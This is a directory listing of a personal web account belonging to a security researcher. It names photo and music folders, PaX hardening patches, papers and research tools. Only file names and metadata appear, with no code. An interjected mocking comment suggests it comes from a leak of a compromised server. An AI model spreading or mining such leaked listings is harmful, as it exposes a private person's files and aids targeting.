-rwx------ 1 titiweb titiweb  3277 2007-08-16 23:28 1187303071212s.jpg
-rwx------ 1 titiweb titiweb  2612 2007-08-16 23:31 1187303462307s.jpg
-rwx------ 1 titiweb titiweb  2498 2007-08-16 23:34 1187303527920s.jpg
-rwx------ 1 titiweb titiweb  3270 2007-08-16 23:35 1187303540801s.jpg
-rwx------ 1 titiweb titiweb  3140 2007-08-16 23:38 1187303764731s.jpg
-rwx------ 1 titiweb titiweb  3325 2007-08-16 23:38 1187303782359s.jpg
-rwx------ 1 titiweb titiweb  2673 2007-08-16 23:38 1187303803798s.jpg
-rwx------ 1 titiweb titiweb  1972 2007-08-16 23:41 1187303990254s.jpg
-rwx------ 1 titiweb titiweb  2351 2007-08-16 23:44 1187304145249s.jpg
-rwx------ 1 titiweb titiweb  1521 2007-08-16 23:51 1187304501360s.jpg
-rwx------ 1 titiweb titiweb  3677 2007-08-16 23:54 1187304696964s.jpg
-rwx------ 1 titiweb titiweb  3304 2007-08-16 23:54 1187304720575s.jpg
-rwx------ 1 titiweb titiweb  3464 2007-08-16 23:54 1187304772063s.jpg
-rwx------ 1 titiweb titiweb  3629 2007-08-17 00:00 1187305061290s.jpg
-rwx------ 1 titiweb titiweb  2727 2007-08-17 00:07 1187305489403s.jpg
-rwx------ 1 titiweb titiweb  2612 2007-08-17 00:07 1187305548366s.jpg
-rwx------ 1 titiweb titiweb  2595 2007-08-17 00:07 1187305572213s.jpg
-rwx------ 1 titiweb titiweb  2347 2007-08-17 00:10 1187305731950s.jpg
-rwx------ 1 titiweb titiweb  3558 2007-08-17 00:13 1187305874642s.jpg
-rwx------ 1 titiweb titiweb  1804 2007-08-17 00:13 1187305922107s.jpg
-rwx------ 1 titiweb titiweb  3641 2007-08-17 00:16 1187306028645s.jpg
-rwx------ 1 titiweb titiweb  2982 2007-08-17 00:16 1187306120044s.jpg
-rwx------ 1 titiweb titiweb  2281 2007-08-17 00:23 1187306453748s.jpg
-rwx------ 1 titiweb titiweb  2249 2007-08-17 00:23 1187306474631s.jpg
-rwx------ 1 titiweb titiweb  2253 2007-08-17 00:23 1187306484013s.jpg
-rwx------ 1 titiweb titiweb  2257 2007-08-17 00:23 1187306495820s.jpg
-rwx------ 1 titiweb titiweb  2306 2007-08-17 00:30 1187306813186s.jpg
-rwx------ 1 titiweb titiweb  3065 2007-08-17 00:30 1187306847145s.jpg
-rwx------ 1 titiweb titiweb  3760 2007-08-17 00:33 1187307069073s.jpg
-rwx------ 1 titiweb titiweb  3089 2007-08-17 00:36 1187307229926s.jpg
-rwx------ 1 titiweb titiweb  2876 2007-08-17 00:36 1187307265581s.jpg
-rwx------ 1 titiweb titiweb  2439 2007-08-17 00:36 1187307279236s.jpg
-rwx------ 1 titiweb titiweb  1830 2007-08-17 00:36 1187307289499s.jpg
-rwx------ 1 titiweb titiweb  3502 2007-08-17 00:37 1187307300191s.jpg
-rwx------ 1 titiweb titiweb  3877 2007-08-17 00:40 1187307425299s.jpg
-rwx------ 1 titiweb titiweb  3887 2007-08-17 00:46 1187307842658s.jpg
-rwx------ 1 titiweb titiweb  2706 2007-08-17 00:50 1187308126848s.jpg
-rwx------ 1 titiweb titiweb  3033 2007-08-17 00:50 1187308138121s.jpg
-rwx------ 1 titiweb titiweb  3077 2007-08-17 00:50 1187308139077s.jpg
-rwx------ 1 titiweb titiweb  2656 2007-08-17 00:53 1187308165364s.jpg
-rwx------ 1 titiweb titiweb  2086 2007-08-17 00:53 1187308176276s.jpg
-rwx------ 1 titiweb titiweb  2266 2007-08-17 00:53 1187308188630s.jpg
-rwx------ 1 titiweb titiweb  1670 2007-08-17 00:53 1187308201458s.jpg
-rwx------ 1 titiweb titiweb  3467 2007-08-17 00:53 1187308212815s.jpg
-rwx------ 1 titiweb titiweb  1941 2007-08-17 00:53 1187308215293s.jpg
-rwx------ 1 titiweb titiweb  2205 2007-08-17 00:53 1187308226796s.jpg
-rwx------ 1 titiweb titiweb  2912 2007-08-17 00:53 1187308239298s.jpg
-rwx------ 1 titiweb titiweb  3546 2007-08-17 00:53 1187308243568s.jpg
-rwx------ 1 titiweb titiweb  3546 2007-08-17 00:53 1187308275904s.jpg
-rwx------ 1 titiweb titiweb  3060 2007-08-17 01:00 1187308601651s.jpg
-rwx------ 1 titiweb titiweb  3585 2007-08-17 01:00 1187308740297s.jpg
-rwx------ 1 titiweb titiweb  3589 2007-08-17 01:03 1187308848421s.jpg
-rwx------ 1 titiweb titiweb  3187 2007-08-17 01:16 1187309608848s.jpg
-rwx------ 1 titiweb titiweb  3161 2007-08-17 01:20 1187309830798s.jpg
-rwx------ 1 titiweb titiweb  3133 2007-08-17 01:20 1187309896440s.jpg
-rwx------ 1 titiweb titiweb  3742 2007-08-17 01:26 1187310156258s.jpg
-rwx------ 1 titiweb titiweb  2530 2007-08-17 01:26 1187310281787s.jpg
-rwx------ 1 titiweb titiweb  2696 2007-08-17 01:26 1187310334487s.jpg
-rwx------ 1 titiweb titiweb  2400 2007-08-17 01:30 1187310509830s.jpg
-rwx------ 1 titiweb titiweb  3730 2007-08-17 01:36 1187310925481s.jpg
-rwx------ 1 titiweb titiweb  2485 2007-08-17 01:43 1187311290186s.jpg
-rwx------ 1 titiweb titiweb  2621 2007-08-17 01:46 1187311444508s.jpg
-rwx------ 1 titiweb titiweb  4447 2007-08-17 01:46 1187311501200s.jpg
-rwx------ 1 titiweb titiweb  2513 2007-08-17 01:53 1187311782043s.jpg
-rwx------ 1 titiweb titiweb  2216 2007-08-17 01:53 1187311898918s.jpg
-rwx------ 1 titiweb titiweb  2198 2007-08-17 01:57 1187312121347s.jpg
-rwx------ 1 titiweb titiweb  3597 2007-08-17 02:00 1187312179145s.jpg
-rwx------ 1 titiweb titiweb  2821 2007-08-17 02:00 1187312342732s.jpg
-rwx------ 1 titiweb titiweb  2368 2007-08-17 02:11 1187312893008s.jpg
-rwx------ 1 titiweb titiweb  2223 2007-08-17 02:14 1187313027904s.jpg
-rwx------ 1 titiweb titiweb  3381 2007-08-17 02:17 1187313329290s.jpg
-rwx------ 1 titiweb titiweb  1817 2007-08-17 02:21 1187313417484s.jpg
-rwx------ 1 titiweb titiweb  2714 2007-08-17 02:21 1187313426706s.jpg
-rwx------ 1 titiweb titiweb  2240 2007-08-17 02:24 1187313802631s.jpg
-rwx------ 1 titiweb titiweb  3475 2007-08-17 02:28 1187314062980s.jpg
-rwx------ 1 titiweb titiweb  3855 2007-08-17 02:45 1187314892419s.jpg
-rwx------ 1 titiweb titiweb  2650 2007-08-17 02:45 1187315032890s.jpg
-rwx------ 1 titiweb titiweb  4768 2007-08-17 02:49 1187315112574s.jpg
-rwx------ 1 titiweb titiweb  3833 2007-08-17 02:56 1187315630830s.jpg
-rwx------ 1 titiweb titiweb  3009 2007-08-17 02:59 1187315803673s.jpg

./bordel/15_aout/rabijacob:
total 17296
drwx------ 2 titiweb titiweb	8192 2007-09-10 22:36 .
drwx------ 4 titiweb titiweb	8192 2007-09-10 22:29 ..
-rwx------ 1 titiweb titiweb	 159 2007-09-10 22:31 .htaccess
-rwx------ 1 titiweb titiweb	  45 2007-09-10 22:32 .htpasswd
-rwx------ 1 titiweb titiweb  360715 2007-08-16 21:12 i_know_kung_fu2.jpg
-rwx------ 1 titiweb titiweb 7655184 2007-08-16 14:21 mvi_0132.avi
-rwx------ 1 titiweb titiweb 5696446 2007-08-16 14:22 mvi_0138.avi
-rwx------ 1 titiweb titiweb 3944762 2007-08-16 14:22 mvi_0139.avi

./bordel/annivs:
total 5024
drwx------  2 titiweb titiweb	 8192 2008-02-10 15:14 .
drwx------ 10 titiweb titiweb	 8192 2009-05-07 22:30 ..
-rwx------  1 titiweb titiweb	  246 2008-02-10 15:14 index.html
-rwx------  1 titiweb titiweb 1109331 2008-02-10 15:09 macha.jpg
-rwx------  1 titiweb titiweb 1315520 2008-02-10 15:14 machaone.jpg
-rwx------  1 titiweb titiweb 1344533 2008-02-10 15:05 witness.the.fitness2.jpg
-rwx------  1 titiweb titiweb 1329064 2008-02-10 14:56 witness.the.fitness.jpg

./bordel/Appart-mtv:
total 4536
drwx------  3 titiweb titiweb	 8192 2009-03-08 01:12 .
drwx------ 10 titiweb titiweb	 8192 2009-05-07 22:30 ..
-rwx------  1 titiweb titiweb  853158 2009-03-08 01:12 dsc_0048.jpg
-rwx------  1 titiweb titiweb 1017594 2009-03-08 01:12 dsc_0049.jpg
-rwx------  1 titiweb titiweb  807347 2009-03-08 01:12 dsc_0050.jpg
-rwx------  1 titiweb titiweb  786562 2009-03-08 01:12 dsc_0051.jpg
-rwx------  1 titiweb titiweb 1075410 2009-03-08 01:12 dsc_0053.jpg
-rwx------  1 titiweb titiweb	 2278 2009-03-08 01:12 index.html
drwx------  2 titiweb titiweb	 8192 2009-03-08 01:12 .llgal
-rwx------  1 titiweb titiweb	 2220 2009-03-08 01:12 slide_1.html
-rwx------  1 titiweb titiweb	 2220 2009-03-08 01:12 slide_2.html
-rwx------  1 titiweb titiweb	 2220 2009-03-08 01:12 slide_3.html
-rwx------  1 titiweb titiweb	 2220 2009-03-08 01:12 slide_4.html
-rwx------  1 titiweb titiweb	 2220 2009-03-08 01:12 slide_5.html

./bordel/Appart-mtv/.llgal:
total 2432
drwx------ 2 titiweb titiweb   8192 2009-03-08 01:12 .
drwx------ 3 titiweb titiweb   8192 2009-03-08 01:12 ..
-rwx------ 1 titiweb titiweb   2116 2009-03-08 01:12 llgal.css
-rwx------ 1 titiweb titiweb 393399 2009-03-08 01:12 scaled_DSC_0048.JPG
-rwx------ 1 titiweb titiweb 448030 2009-03-08 01:12 scaled_DSC_0049.JPG
-rwx------ 1 titiweb titiweb 380340 2009-03-08 01:12 scaled_DSC_0050.JPG
-rwx------ 1 titiweb titiweb 373486 2009-03-08 01:12 scaled_DSC_0051.JPG
-rwx------ 1 titiweb titiweb 467905 2009-03-08 01:12 scaled_DSC_0053.JPG
-rwx------ 1 titiweb titiweb  72335 2009-03-08 01:12 thumb_DSC_0048.JPG
-rwx------ 1 titiweb titiweb  72637 2009-03-08 01:12 thumb_DSC_0049.JPG
-rwx------ 1 titiweb titiweb  73054 2009-03-08 01:12 thumb_DSC_0050.JPG
-rwx------ 1 titiweb titiweb  72415 2009-03-08 01:12 thumb_DSC_0051.JPG
-rwx------ 1 titiweb titiweb  73827 2009-03-08 01:12 thumb_DSC_0053.JPG

./bordel/caves:
total 1648
drwx------  2 titiweb titiweb	8192 2006-07-09 23:02 .
drwx------ 10 titiweb titiweb	8192 2009-05-07 22:30 ..
-rwx------  1 titiweb titiweb 114464 2006-07-09 23:01 img_1700.jpg
-rwx------  1 titiweb titiweb 205462 2006-07-09 23:01 img_1701.jpg
-rwx------  1 titiweb titiweb 242320 2006-07-09 23:01 img_1702.jpg
-rwx------  1 titiweb titiweb 199514 2006-07-09 23:01 img_1703.jpg
-rwx------  1 titiweb titiweb 213338 2006-07-09 23:01 img_1704.jpg
-rwx------  1 titiweb titiweb 257722 2006-07-09 23:01 img_1705.jpg
-rwx------  1 titiweb titiweb 232773 2006-07-09 23:01 img_1706.jpg
-rwx------  1 titiweb titiweb 154247 2006-07-09 23:01 img_1707.jpg
-rwx------  1 titiweb titiweb	 386 2006-07-09 23:02 index.html
-rwx------  1 titiweb titiweb	 134 2006-07-09 23:02 indexor.rb

./bordel/juan:
total 2056
drwx------  2 titiweb titiweb	8192 2006-06-24 20:30 .
drwx------ 10 titiweb titiweb	8192 2009-05-07 22:30 ..
-rwx------  1 titiweb titiweb 195317 2006-06-24 20:24 img_1565.jpg
-rwx------  1 titiweb titiweb 199963 2006-06-24 20:25 img_1567.jpg
-rwx------  1 titiweb titiweb 192582 2006-06-24 20:25 img_1568.jpg
-rwx------  1 titiweb titiweb 163851 2006-06-24 20:26 img_1569.jpg
-rwx------  1 titiweb titiweb 182885 2006-06-24 20:26 img_1570.jpg
-rwx------  1 titiweb titiweb 142956 2006-06-24 20:27 img_1571.jpg
-rwx------  1 titiweb titiweb 202971 2006-06-24 20:27 img_1572.jpg
-rwx------  1 titiweb titiweb 201044 2006-06-24 20:28 img_1573.jpg
-rwx------  1 titiweb titiweb 186734 2006-06-24 20:28 img_1574.jpg
-rwx------  1 titiweb titiweb 180439 2006-06-24 20:28 img_1575.jpg
-rwx------  1 titiweb titiweb 176495 2006-06-24 20:29 img_1576.jpg
-rwx------  1 titiweb titiweb	 521 2006-06-24 20:30 index.html
-rwx------  1 titiweb titiweb	 134 2006-06-24 20:30 indexor.rb

./bordel/ph:
total 16
drwx------  2 titiweb titiweb 8192 2006-05-27 11:47 .
drwx------ 10 titiweb titiweb 8192 2009-05-07 22:30 ..

./bordel/suicide:
total 82712
drwx------  2 titiweb titiweb	 8192 2007-08-06 16:58 .
drwx------ 10 titiweb titiweb	 8192 2009-05-07 22:30 ..
-rwx------  1 titiweb titiweb 3529793 2006-05-10 01:32 03 - Once upon a Time in
the West.mp3
-rwx------  1 titiweb titiweb 3969317 2006-05-10 01:16
104-noir_desir-des_armes-just.mp3
-rwx------  1 titiweb titiweb 5936832 2006-05-10 01:17
105-noir_desir-l_appartement-just.mp3
-rwx------  1 titiweb titiweb 4842603 2006-05-10 01:31 14 - Le
Professionnel.mp3
-rwx------  1 titiweb titiweb 5394808 2006-05-10 01:21
dolly_-_dolly_-_06_-_partir_seule.mp3
-rwx------  1 titiweb titiweb 5561701 2006-05-10 01:20
[Fight_Club_-_The_Pixies]_-_Where_Is_My_Mind_(End_Credits).mp3	##
pr0j3kt-m4yh3m inspired im sure.
-rwx------  1 titiweb titiweb	  130 2006-05-10 01:44 .htaccess
-rwx------  1 titiweb titiweb	   19 2007-08-06 16:58 .htpasswd
-rwx------  1 titiweb titiweb	 1392 2006-05-10 01:32 index.html
-rwx------  1 titiweb titiweb	  134 2006-05-10 01:27 indexor.rb
-rwx------  1 titiweb titiweb 8220421 2006-05-10 01:23
joan_osborne-one_of_us.mp3
-rwx------  1 titiweb titiweb 4680278 2006-05-10 01:24 killing_me_softly.mp3
-rwx------  1 titiweb titiweb 3078144 2006-05-10 01:24
laputa_-_22_-_the_destruction_of_laputa.mp3
-rwx------  1 titiweb titiweb 2991252 2006-05-10 01:25 octavia_solicitude.mp3
-rwx------  1 titiweb titiweb 6075036 2006-05-10 01:26
placebo-burger_queen_francais.mp3
-rwx------  1 titiweb titiweb 5681865 2006-05-10 01:19 Queen (11 - Bohemian
Rhapsody).mp3
-rwx------  1 titiweb titiweb 6604799 2006-05-10 01:27 save.me.mp3
-rwx------  1 titiweb titiweb 6770080 2006-05-10 01:28 the.blowers.daughter.mp3
-rwx------  1 titiweb titiweb 5847434 2006-05-10 01:04
within_temptation-memories.mp3
-rwx------  1 titiweb titiweb 5406555 2006-05-10 01:29
within_temptation-restless-unplugged.mp3

./bordel/usa:
total 2488
drwx------  2 titiweb titiweb	 8192 2008-05-21 21:55 .
drwx------ 10 titiweb titiweb	 8192 2009-05-07 22:30 ..
-rwx------  1 titiweb titiweb 1272793 2008-05-21 21:55 grand.canyon.2.jpg
-rwx------  1 titiweb titiweb 1250136 2008-05-21 21:56 grand.canyon.jpg

./cr0-ca:
total 48
drwx------  2 titiweb titiweb 8192 2005-12-29 03:21 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb 1452 2005-12-29 03:20 cr0cacert.crt
-rwx------  1 titiweb titiweb  189 2005-12-29 03:20 cr0cacert.crt.asc
-rwx------  1 titiweb titiweb  711 2005-12-29 03:21 index.php
-rwx------  1 titiweb titiweb  907 2005-12-29 03:20 style.css

./exploits:
total 16
drwx------  2 titiweb titiweb 8192 2007-06-17 18:54 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..

./ip:
total 24
drwx------  2 titiweb titiweb 8192 2009-02-14 15:27 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb  413 2009-02-14 15:17 index.php

./kexploits-pub:
total 24
drwx------  2 titiweb titiweb 8192 2008-09-16 17:37 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb	11 2007-10-06 13:45 index.html

./lobster:
total 48
drwx------  2 titiweb titiweb 8192 2005-12-30 12:13 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb  717 2005-12-30 12:13 index.php
-rwx------  1 titiweb titiweb 1318 2005-12-30 12:11 lobstercert.crt
-rwx------  1 titiweb titiweb  189 2005-12-30 12:11 lobstercert.crt.asc
-rwx------  1 titiweb titiweb  907 2005-12-30 12:10 style.css

./misc:
total 168
drwx------  2 titiweb titiweb  8192 2009-05-19 22:26 .
drwx------ 15 titiweb titiweb  8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb  3554 2009-05-19 22:26 calendarpatch.patch
-rwx------  1 titiweb titiweb 99220 2007-06-17 19:50 jt-securitech-06-11.pdf
-rwx------  1 titiweb titiweb  4448 2008-06-11 12:38 julien.at.cr0.asc
-rwx------  1 titiweb titiweb  6962 2008-09-16 17:36 mipsfencoder.tgz
-rwx------  1 titiweb titiweb	611 2005-11-27 18:46 obsdretf.asm
-rwx------  1 titiweb titiweb  5716 2008-07-22 15:15 securitech-v2
-rwx------  1 titiweb titiweb  3267 2009-04-01 03:26 smile.rb

./paper:
total 2384
drwx------  2 titiweb titiweb	 8192 2009-04-23 00:17 .
drwx------ 15 titiweb titiweb	 8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb 2197420 2008-03-04 13:35 hacklu2007-final.pdf
-rwx------  1 titiweb titiweb  131543 2008-06-11 12:21 jt-rr-rr-openssl.pdf
-rwx------  1 titiweb titiweb	 3324 2006-03-10 16:21
mips.elf.external.resolution.txt
-rwx------  1 titiweb titiweb	70388 2009-04-23 00:17
to-jt-linux-alsr-leak.pdf

./pax:
total 2056
drwx------  6 titiweb titiweb	8192 2008-09-14 12:20 .
drwx------ 15 titiweb titiweb	8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb	9700 2004-09-10 16:12
binutils-2.14.90.0.8-pt-pax-flags-200402042140.patch
-rwx------  1 titiweb titiweb  14035 2004-11-06 16:05
binutils-2.15.92.0.2-pt-pax-flags-200411061615.patch
-rwx------  1 titiweb titiweb	5255 2004-09-10 16:12 chpax-0.7.tar.gz
-rwx------  1 titiweb titiweb	 193 2004-09-10 16:12 chpax.cfg
-rwx------  1 titiweb titiweb	7256 2004-09-10 16:12 chpax.old.c
-rwx------  1 titiweb titiweb	2354 2004-09-10 16:12 chpax.sh
-rwx------  1 titiweb titiweb	2147 2005-12-04 18:15 Diamond.css
-rwx------  1 titiweb titiweb 158812 2005-12-04 18:16 diffie.txt
drwx------  2 titiweb titiweb	8192 2005-01-07 19:39 docs
drwx------  2 titiweb titiweb	8192 2008-09-14 12:20 es
drwx------  2 titiweb titiweb	8192 2005-12-03 18:31 esobsdreports
-rwx------  1 titiweb titiweb	7840 2004-09-10 16:12 et_dyn.tar.gz
drwx------  3 titiweb titiweb	8192 2005-12-03 18:31 ex
-rwx------  1 titiweb titiweb	8945 2004-11-25 23:50 index.html
-rwx------  1 titiweb titiweb 109892 2005-12-04 18:16 jt_owl.png
-rwx------  1 titiweb titiweb  11195 2005-12-04 18:15 jt_owl.svg
-rwx------  1 titiweb titiweb 108220 2005-12-04 18:16 jt_pax_segmexec.png
-rwx------  1 titiweb titiweb  15164 2005-12-04 18:16 jt_pax_segmexec.svg
-rwx------  1 titiweb titiweb  80919 2005-12-08 18:31
jt_protection_espace_addr.html
-rwx------  1 titiweb titiweb  49152 2005-10-16 13:40
.jt_protection_espace_addr.html.swo
-rwx------  1 titiweb titiweb 111950 2005-12-04 18:15 jt_sys_pagination.png
-rwx------  1 titiweb titiweb  36208 2005-12-04 18:15 jt_sys_pagination.svg
-rwx------  1 titiweb titiweb 133997 2005-12-04 18:15 jt_sys_segmentation.png
-rwx------  1 titiweb titiweb  35123 2005-12-04 18:15 jt_sys_segmentation.svg
-rwx------  1 titiweb titiweb  31977 2005-12-04 18:15 jt_sys_segmpag.png
-rwx------  1 titiweb titiweb	6011 2005-12-04 18:15 jt_sys_segmpag.svg
-rwx------  1 titiweb titiweb  27531 2005-12-04 18:15 jt_sys_ss_exemple.png
-rwx------  1 titiweb titiweb	7123 2005-12-04 18:15 jt_sys_ss_exemple.svg
-rwx------  1 titiweb titiweb  23111 2005-12-04 18:15 jt_sys_ss.png
-rwx------  1 titiweb titiweb	6022 2005-12-04 18:15 jt_sys_ss.svg
-rwx------  1 titiweb titiweb	4786 2004-09-10 16:12 paxctl-0.2.tar.gz
-rwx------  1 titiweb titiweb 241027 2004-11-06 13:23
pax-linux-2.2.26-200411061335.patch
-rwx------  1 titiweb titiweb 301305 2004-11-25 23:49
pax-linux-2.4.28-200411252350.patch
-rwx------  1 titiweb titiweb 297331 2004-11-06 13:31
pax-linux-2.6.7-200411061335.patch
-rwx------  1 titiweb titiweb  26961 2004-09-10 16:12 paxtest-0.9.5.tar.gz
-rwx------  1 titiweb titiweb	  71 2004-09-10 16:12 robots.txt
-rwx------  1 titiweb titiweb	2107 2005-12-04 18:15 test.svg
-rwx------  1 titiweb titiweb	 495 2005-12-04 18:15 todo
-rwx------  1 titiweb titiweb  26449 2004-09-10 16:12 tux_pen1.jpg

./pax/docs:
total 224
drwx------ 2 titiweb titiweb  8192 2005-01-07 19:39 .
drwx------ 6 titiweb titiweb  8192 2008-09-14 12:20 ..
-rwx------ 1 titiweb titiweb 12216 2004-09-10 16:12 aslr.txt
-rwx------ 1 titiweb titiweb  2358 2004-09-10 16:12 emusigrt.txt
-rwx------ 1 titiweb titiweb  4709 2004-09-10 16:12 emutramp.txt
-rwx------ 1 titiweb titiweb  3810 2004-09-10 16:12 index.html
-rwx------ 1 titiweb titiweb  6752 2004-09-10 16:12 mprotect.txt
-rwx------ 1 titiweb titiweb  4237 2004-09-10 16:12 noexec.txt
-rwx------ 1 titiweb titiweb 29019 2004-09-10 16:12 pageexec.old.txt
-rwx------ 1 titiweb titiweb  9259 2004-09-10 16:12 pageexec.txt
-rwx------ 1 titiweb titiweb 24208 2004-09-10 16:12 pax-future.txt
-rwx------ 1 titiweb titiweb  8598 2004-09-10 16:12 pax.txt
-rwx------ 1 titiweb titiweb  8145 2004-09-10 16:12 randexec.txt
-rwx------ 1 titiweb titiweb  4516 2004-09-10 16:12 randkstack.txt
-rwx------ 1 titiweb titiweb  2532 2004-09-10 16:12 randmmap.txt
-rwx------ 1 titiweb titiweb  2675 2004-09-10 16:12 randustack.txt
-rwx------ 1 titiweb titiweb  3830 2004-09-10 16:12 segmexec.txt
-rwx------ 1 titiweb titiweb 21575 2004-09-10 16:12 vmmirror.txt

./pax/es:
total 592
drwx------ 2 titiweb titiweb   8192 2008-09-14 12:20 .
drwx------ 6 titiweb titiweb   8192 2008-09-14 12:20 ..
-rwx------ 1 titiweb titiweb	358 2005-12-04 18:15 anties.c
-rwx------ 1 titiweb titiweb   9183 2005-12-04 18:15 a.out
-rwx------ 1 titiweb titiweb  13379 2005-12-04 18:15 dtdumper
-rwx------ 1 titiweb titiweb  10153 2005-12-04 18:15 dtdumper.c
-rwx------ 1 titiweb titiweb	270 2005-12-04 18:15 Makefile
-rwx------ 1 titiweb titiweb   7278 2005-12-04 18:15 mldt
-rwx------ 1 titiweb titiweb	417 2005-12-04 18:15 mldt.c
-rwx------ 1 titiweb titiweb	611 2005-11-27 18:44 obsd.asm
-rwx------ 1 titiweb titiweb  10892 2005-12-04 18:15 obsddtd.c
-rwx------ 1 titiweb titiweb	611 2005-12-04 18:15 obsdretf.asm
-rwx------ 1 titiweb titiweb 116361 2005-12-04 18:15 plop.tgz
-rwx------ 1 titiweb titiweb 319488 2005-11-27 01:19 pute
-rwx------ 1 titiweb titiweb  13570 2005-12-04 18:15 test
-rwx------ 1 titiweb titiweb   1911 2005-12-04 18:15 test.asm
-rwx------ 1 titiweb titiweb   2336 2005-12-04 18:15 test.o

./pax/esobsdreports:
total 520
drwx------ 2 titiweb titiweb   8192 2005-12-03 18:31 .
drwx------ 6 titiweb titiweb   8192 2008-09-14 12:20 ..
-rwx------ 1 titiweb titiweb	566 2005-12-04 18:16 es-24.dtdumper.maps.txt
-rwx------ 1 titiweb titiweb   2842 2005-12-04 18:16 es-24.dtdumper.txt
-rwx------ 1 titiweb titiweb  11304 2005-12-04 18:16 es-24.txt
-rwx------ 1 titiweb titiweb   3290 2005-12-04 18:16 es26.dtdumper.txt
-rwx------ 1 titiweb titiweb   1717 2005-12-04 18:16 es-26-paxtest.log
-rwx------ 1 titiweb titiweb   3494 2005-12-04 18:16 esreports.tgz
-rwx------ 1 titiweb titiweb   1663 2005-12-04 18:16 obsdpt.log
-rwx------ 1 titiweb titiweb 444873 2005-12-04 18:16 openbsd.dtdumper.txt

./pax/ex:
total 104
drwx------ 3 titiweb titiweb  8192 2005-12-03 18:31 .
drwx------ 6 titiweb titiweb  8192 2008-09-14 12:20 ..
-rwx------ 1 titiweb titiweb 35716 2005-10-16 13:40
binutils-2.15.92.0.2-pt-pax-flags-200503112110.patch
-rwx------ 1 titiweb titiweb 16504 2005-12-04 18:15 cat
-rwx------ 1 titiweb titiweb   612 2005-12-04 18:15 maps.txt
drwx------ 2 titiweb titiweb  8192 2005-12-03 18:31 paxctl-0.3
-rwx------ 1 titiweb titiweb  5382 2005-12-04 18:15 paxctl-0.3.tar.gz

./pax/ex/paxctl-0.3:
total 104
drwx------ 2 titiweb titiweb  8192 2005-12-03 18:31 .
drwx------ 3 titiweb titiweb  8192 2005-12-03 18:31 ..
-rwx------ 1 titiweb titiweb   202 2005-12-04 18:15 ChangeLog
-rwx------ 1 titiweb titiweb   431 2005-12-04 18:15 Makefile
-rwx------ 1 titiweb titiweb 13526 2005-12-04 18:15 paxctl
-rwx------ 1 titiweb titiweb  2691 2005-12-04 18:15 paxctl.1
-rwx------ 1 titiweb titiweb 12454 2005-12-04 18:15 paxctl.c
-rwx------ 1 titiweb titiweb  1448 2005-12-04 18:15 paxctl.h
-rwx------ 1 titiweb titiweb  8608 2005-12-04 18:15 paxctl.o
-rwx------ 1 titiweb titiweb  1077 2005-12-04 18:15 readme

./pax-obscure:
total 64
drwx------  3 titiweb titiweb 8192 2005-01-21 13:04 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
-rwx------  1 titiweb titiweb 1032 2003-08-31 03:25 index.php
drwx------  2 titiweb titiweb 8192 2003-08-30 22:54 old
-rwx------  1 titiweb titiweb 2270 2003-08-30 21:57
pax+obs-linux-2.4.22-200308302223.tar.gz
-rwx------  1 titiweb titiweb	65 2003-08-30 21:57
pax+obs-linux-2.4.22-200308302223.tar.gz.sig
-rwx------  1 titiweb titiweb 1050 2003-08-30 23:01 README-PAX+obs
-rwx------  1 titiweb titiweb  910 2003-08-31 02:00 style.css

./pax-obscure/old:
total 24
drwx------ 2 titiweb titiweb 8192 2003-08-30 22:54 .
drwx------ 3 titiweb titiweb 8192 2005-01-21 13:04 ..
-rwx------ 1 titiweb titiweb  720 2003-08-30 22:05 index.html

./progs:
total 56
drwx------  7 titiweb titiweb 8192 2008-07-07 22:52 .
drwx------ 15 titiweb titiweb 8192 2009-05-20 00:17 ..
drwx------  2 titiweb titiweb 8192 2009-03-04 09:44 crctools
drwx------  2 titiweb titiweb 8192 2007-09-26 20:33 dtdumper
drwx------  2 titiweb titiweb 8192 2009-03-10 16:57 slipfest
drwx------  2 titiweb titiweb 8192 2008-07-21 15:21 sshfun
drwx------  3 titiweb titiweb 8192 2008-07-09 00:23 ttytools

./progs/crctools:
total 40
drwx------ 2 titiweb titiweb 8192 2009-03-04 09:44 .
drwx------ 7 titiweb titiweb 8192 2008-07-07 22:52 ..
-rwx------ 1 titiweb titiweb 2536 2007-06-17 21:50 cr0.css
-rwx------ 1 titiweb titiweb 4478 2007-06-17 21:50 crctools-v0.1.tgz
-rwx------ 1 titiweb titiweb 2130 2009-03-04 09:43 index.html

./progs/dtdumper:
total 80
drwx------ 2 titiweb titiweb  8192 2007-09-26 20:33 .
drwx------ 7 titiweb titiweb  8192 2008-07-07 22:52 ..
-rwx------ 1 titiweb titiweb  4982 2006-01-06 22:11 dtdumper-0.1.1.tgz
-rwx------ 1 titiweb titiweb  5994 2007-09-26 20:30 dtdumper-0.1.3.tgz
-rwx------ 1 titiweb titiweb 10134 2005-10-23 23:13 dtdumper.c
-rwx------ 1 titiweb titiweb   577 2005-12-30 12:09 index.html
-rwx------ 1 titiweb titiweb   943 2007-09-26 20:33 index.php
-rwx------ 1 titiweb titiweb   564 2007-09-26 20:30 readme
-rwx------ 1 titiweb titiweb   907 2006-01-06 19:29 style.css

./progs/slipfest:
total 448
drwx------ 2 titiweb titiweb   8192 2009-03-10 16:57 .
drwx------ 7 titiweb titiweb   8192 2008-07-07 22:52 ..
-rwx------ 1 titiweb titiweb   2536 2006-03-28 14:22 cr0.css
-rwx------ 1 titiweb titiweb   1078 2006-03-28 13:30 favicon.ico
-rwx------ 1 titiweb titiweb   6642 2009-03-10 16:57 index.html
-rwx------ 1 titiweb titiweb 119746 2006-03-28 17:35 jt-csw2006-slipfest.pdf
-rwx------ 1 titiweb titiweb 138331 2006-03-28 13:30 slipfest-1.01+src.zip
-rwx------ 1 titiweb titiweb	 65 2006-03-28 13:30 slipfest-1.01+src.zip.sig
-rwx------ 1 titiweb titiweb 131898 2006-03-30 13:46 slipfest-1.03+src.zip
-rwx------ 1 titiweb titiweb	 65 2006-04-01 00:00 slipfest-1.03+src.zip.sig

./progs/sshfun:
total 4384
drwx------ 2 titiweb titiweb	8192 2008-07-21 15:21 .
